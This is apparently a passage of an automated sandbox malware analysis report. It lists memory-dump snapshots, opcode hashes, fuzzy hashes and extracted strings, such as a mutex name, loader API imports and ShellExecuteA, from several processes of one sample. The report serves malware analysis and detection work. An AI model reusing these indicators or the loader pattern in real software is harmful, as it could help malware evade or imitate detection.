• Opcode ID: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
• Instruction ID: 0f2e3776d4033076f14d080b5f2710a37b7358181f7827b901d9cad2405bc6a7
• Opcode Fuzzy Hash: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
• Instruction Fuzzy Hash: C8614B71650289ABEF12DFA0CC89FEA3778AB04741F440515FB09AE1E0D6B1A6448B6E
Memory Dump Source
• Source File: 0000002A.00000002.4035021990.00000000012B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_12b0000_sedSmibSjDOiaD.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction ID: e737fa954271bbed08802db2f39492109d31dc6ac7215e88127e61a609927b2f
• Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction Fuzzy Hash: 02B12D71A1018A8FEB11CF18CC84BEA77B5FF44344F484925EE09AF2A1D375AA54CB4E
Strings
Memory Dump Source
• Source File: 0000002A.00000002.4035021990.00000000012B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_12b0000_sedSmibSjDOiaD.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$X@$open
• API String ID: 0-1075979870
• Opcode ID: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
• Instruction ID: 8c6c4e63ffd4e436156d660442e263b597d48f3d29ed619da9da083a5d0a70d5
• Opcode Fuzzy Hash: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
• Instruction Fuzzy Hash: 91111B71250289ABFF11DEA48D4DFEE37A8AB84B41F040415BB09FE0E0DAB19244872F
Strings
Memory Dump Source
• Source File: 0000002B.00000002.4021611078.0000000000790000.00000040.00000001.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_43_2_790000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$X@$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                                                                            • API String ID: 0-623675093
                                                                                                                                                                                                                                                                                            • Opcode ID: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
                                                                                                                                                                                                                                                                                            • Instruction ID: 36495451f2e1cab205963a48d0fca6b329c0a69574f4207b40177a35a2d5fb23
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C616C71650288EFEF10DFA0DC4DFAA3768EF04B01F540515EE09BE1F0D6B56A448BAA
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000002B.00000002.4021611078.0000000000790000.00000040.00000001.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_43_2_790000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                                                                            • Instruction ID: 6b0e2c75d3dd801917f9a38f67c70baa665accd0734252c6b7e94fa1c932f986
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6B14871A102898FEF10CF68DC44BA937A5FF54314F484925DD0DAF2A1D379AA94CF8A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000002B.00000002.4021611078.0000000000790000.00000040.00000001.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_43_2_790000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$X@$open
                                                                                                                                                                                                                                                                                            • API String ID: 0-1075979870
                                                                                                                                                                                                                                                                                            • Opcode ID: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
                                                                                                                                                                                                                                                                                            • Instruction ID: 368369e99cd3e5c999c9dbedc84e3714ec24230aa2039f1eed9259f5ccbc349d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C111E71250289AFEF10DFA08D4DFE937A8AB84B01F040414BA09FE0E0DAB59644876B
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000002C.00000002.4027546869.0000000000A20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_44_2_a20000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$X@$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                                                                            • API String ID: 0-623675093
                                                                                                                                                                                                                                                                                            • Opcode ID: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
                                                                                                                                                                                                                                                                                            • Instruction ID: 727736f2e168e0fc029737fde528739f414777a1e1b051b960d1c11a53e2caf8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B617D71640298EBEF10DFA4DD89FEA3768EF04701F540525EE09BE1F1D6B166448B2E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000002C.00000002.4027546869.0000000000A20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_44_2_a20000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                                                                            • Instruction ID: 638dfd9abf0dfeb3af369276e0f79171af5ebdb5cd29c60a33511bb945597714
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1EB14871A002998FEF10CF28DD84BA937A5FF54304F494925DD0DAF2A2D375AA94CF4A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000002C.00000002.4027546869.0000000000A20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_44_2_a20000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$X@$open
                                                                                                                                                                                                                                                                                            • API String ID: 0-1075979870
                                                                                                                                                                                                                                                                                            • Opcode ID: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
                                                                                                                                                                                                                                                                                            • Instruction ID: 1688d50a691e2aec2de13eedc09a0724f52944e053894d67ee27aa46a5e1996a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2111DE71244289ABEF10DFA48D4DFD937A9AB84B05F444425BF09FE0E0DAB19644876B
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000002D.00000002.4030461702.0000000000AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_45_2_ad0000_sedSmibSjDOiaD.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$X@$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                                                                            • API String ID: 0-623675093
                                                                                                                                                                                                                                                                                            • Opcode ID: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
• Instruction ID: 9445cb2bd60ce45c7eaf2e9520c58c662bb59cb552f153a2d21c80da58ebefba
• Opcode Fuzzy Hash: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
• Instruction Fuzzy Hash: A5616F71640289EBEF10DF60CD49FEA3768EF45701F540516FE0ABE2E0D6B1A6448B5E
Memory Dump Source
• Source File: 0000002D.00000002.4030461702.0000000000AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_45_2_ad0000_sedSmibSjDOiaD.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction ID: 155b0dd85af29994e73804ee146abf41e5f76d27504a1502886be85038dfcaec
• Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction Fuzzy Hash: 08B12875A002898FEF10CF24CD44BA937A5FF54304F494926DD0EAF3A1D375AA94CB5A
Strings
Memory Dump Source
• Source File: 0000002D.00000002.4030461702.0000000000AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_45_2_ad0000_sedSmibSjDOiaD.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$X@$open
• API String ID: 0-1075979870
• Opcode ID: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
• Instruction ID: 27d07625a8d293dc96ec76d44bf51b48efd2bc95c8b838ecfad38ac9afd78879
• Opcode Fuzzy Hash: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
• Instruction Fuzzy Hash: 8411DE71244289ABEF10DFA08D4DFDD37A8AB94B05F444415BB0AFE1E0DAB19644876B
Strings
Memory Dump Source
• Source File: 0000002E.00000002.4035478978.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_46_2_b90000_sedSmibSjDOiaD.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$X@$hh8geqpHJTkdns6$open$purity_control_7728
• API String ID: 0-623675093
• Opcode ID: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
• Instruction ID: 240e2ef5666cb5b93a9b06a5bfe4546e5b5098e66b02435099bb2a19898a4c4e
• Opcode Fuzzy Hash: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
• Instruction Fuzzy Hash: 48616F71650288AFEF10EF60CC89FAA37A8EF04B01F544565FE09BE1F0D6B166448B5A
Memory Dump Source
• Source File: 0000002E.00000002.4035478978.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_46_2_b90000_sedSmibSjDOiaD.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction ID: bbcabdb9d06c0c4eb48eef452401be8fa713c13d8328e3c11823ba990f65179c
• Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction Fuzzy Hash: B7B15C31A102898FEF10DF68CC84BA937E5FF54314F484865DC0DAF2A1D375AA94CB9A
Strings
Memory Dump Source
• Source File: 0000002E.00000002.4035478978.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_46_2_b90000_sedSmibSjDOiaD.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$X@$open
• API String ID: 0-1075979870
• Opcode ID: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
• Instruction ID: 41cb0db615ea945a8311bbed76d436846bfea1efdf24f9634cdcb2c25593fb7d
• Opcode Fuzzy Hash: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
• Instruction Fuzzy Hash: 05111271250289AFEF10EFA08D4DFE93798DB44B01F040414BA09FD0D0DAB19644872B